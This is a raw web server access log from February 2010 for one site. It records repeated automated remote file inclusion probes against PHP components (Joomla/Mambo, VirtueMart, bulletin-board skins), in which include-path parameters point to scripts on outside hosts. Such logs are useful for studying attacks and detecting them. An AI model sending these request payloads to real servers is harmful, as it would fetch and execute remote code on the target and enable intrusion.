222.237.78.176 - - [06/Feb/2010:04:18:39 -0800] "GET /logs/about.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:18:41 -0800] "GET /logs/about.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:18:41 -0800] "GET /about.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:04:21:08 -0800] "GET /logs/access_100130.log/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:04:21:31 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:04:21:31 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:04:21:43 -0800] "GET /logs/access_091121.log/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:04:21:59 -0800] "GET /logs/access_100116.log//board/bbs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:04:21:59 -0800] "GET /board/bbs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:04:21:59 -0800] "GET /logs//board/bbs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:22:05 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:22:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:22:08 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:22:19 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:22:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:22:24 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:04:23:10 -0800] "GET /board/bbs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:04:23:10 -0800] "GET /logs/access_100130.log//board/bbs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:04:23:10 -0800] "GET /logs//board/bbs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:25:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:25:15 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:25:16 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:25:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:25:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [06/Feb/2010:04:25:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:25:46 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:25:46 -0800] "GET /logs/access_100123.log/administrator/components/com_admin/admin.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:25:47 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:26:18 -0800] "GET /logs/access_100102.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:26:19 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:26:19 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:04:27:15 -0800] "GET /logs/access_100130.log/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:27:26 -0800] "GET /logs/access_100102.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:27:27 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:27:27 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
200.62.136.226 - - [06/Feb/2010:04:27:59 -0800] "GET /logs/access_091121.log/phphtml.php?htmlclass_path=http://jesus91.or.kr/new/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:04:28:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:04:28:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:04:28:57 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:04:29:05 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:04:29:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:04:29:05 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:30:18 -0800] "GET //good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:04:30:18 -0800] "GET /logs///good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:31:23 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:31:23 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:31:23 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:36:21 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:36:21 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:36:22 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:37:24 -0800] "GET /logs/access_100102.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:37:25 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:37:25 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:16 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:16 -0800] "GET /logs/access.log//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:16 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:17 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:17 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:17 -0800] "GET /logs/access.log//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:23 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:23 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:23 -0800] "GET /logs/access.log//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:24 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:24 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:38:24 -0800] "GET /logs/access.log//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:42:53 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:42:54 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:42:54 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:43:38 -0800] "GET /logs/access_100102.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:43:38 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:43:39 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:04:45:41 -0800] "GET /logs/access_091121.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:51:45 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:51:45 -0800] "GET /logs/access.log%20%20//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:51:45 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:06 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:06 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:06 -0800] "GET /logs/access.log%20%20//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
210.116.103.96 - - [06/Feb/2010:04:52:10 -0800] "GET /logs/access_091121.log//skin/ggambo7002_board/write.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:18 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:18 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:18 -0800] "GET /logs/access.log%20%20//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:40 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:40 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:04:52:40 -0800] "GET /logs/access.log%20%20//daerew_45galleryGD/setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:52:49 -0800] "GET /logs/access_100123.log/administrator/components/com_admin/toolbar.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:52:49 -0800] "GET /administrator/components/com_admin/toolbar.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:52:50 -0800] "GET /logs/administrator/components/com_admin/toolbar.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:56:59 -0800] "GET /administrator/components/com_admin/toolbar.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:56:59 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_admin/toolbar.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:04:56:59 -0800] "GET /logs/administrator/components/com_admin/toolbar.admin.html.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:04:59:52 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:04:59:52 -0800] "GET /logs/access_091121.log////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:04:59:52 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:00:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:00:20 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:00:20 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:02:24 -0800] "GET /logs/access_091121.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:02:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:02:50 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:02:50 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:04:12 -0800] "GET /logs/access_091121.log////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:04:13 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:04:13 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
84.40.23.86 - - [06/Feb/2010:05:04:27 -0800] "GET /logs/access_100123.log//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
84.40.23.86 - - [06/Feb/2010:05:04:28 -0800] "GET /logs//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
84.40.23.86 - - [06/Feb/2010:05:04:28 -0800] "GET /?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:04:30 -0800] "GET /logs/access_091121.log////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:04:30 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:04:30 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:04:35 -0800] "GET /logs/access_100123.log//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:04:35 -0800] "GET /?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:04:35 -0800] "GET /logs//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
84.40.23.86 - - [06/Feb/2010:05:04:36 -0800] "GET /logs/access_100123.log//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
84.40.23.86 - - [06/Feb/2010:05:04:36 -0800] "GET /?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
84.40.23.86 - - [06/Feb/2010:05:04:37 -0800] "GET /logs//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:05:27 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
